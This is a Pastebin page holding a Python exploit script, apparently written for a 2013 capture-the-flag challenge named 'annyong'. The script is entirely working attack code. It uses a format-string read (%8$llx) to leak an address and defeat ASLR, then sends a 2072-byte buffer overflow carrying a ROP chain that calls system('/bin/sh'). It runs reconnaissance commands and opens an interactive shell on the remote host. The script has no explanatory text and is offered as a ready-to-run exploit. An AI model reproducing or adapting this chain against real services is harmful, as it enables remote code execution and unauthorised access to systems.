Advertisement
Guest User

annyong exploit

a guest
Jun 17th, 2013
535
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2.  
  3. from struct import pack
  4. import telnetlib
  5. import socket
  6. import sys
  7.  
  8. addr = "annyong.shallweplayaga.me"
  9. port = 5679
  10.  
  11. s = socket.socket()
  12. s.connect((addr, port))
  13. f = s.makefile('rw', bufsize=0)
  14.  
  15. pop_rdi_ret = 0x7ffff7a8afd1
  16. bin_sh_addr = 0x7ffff7b949d1
  17. system_addr = 0x7ffff7a60660
  18.  
  19. f.write('''%8$llx\n''')
  20. curr = int(f.readline().strip(), 16)
  21. orig = 0x7ffff7ffd040
  22. diff = orig - curr
  23.  
  24. buf = ""
  25. buf += "A"*2072
  26. buf += pack("<Q", pop_rdi_ret - diff) # pop rdi; ret
  27. buf += pack("<Q", bin_sh_addr - diff) # rdi = "/bin/sh"
  28. buf += pack("<Q", system_addr - diff) # system()
  29.  
  30. f.write(buf + "\n")
  31. f.write("echo pwn;id;uname -a;ls -la\n")
  32.  
  33. t = telnetlib.Telnet()
  34. t.sock = s
  35. t.interact()
Advertisement
RAW Paste Data Copied
Advertisement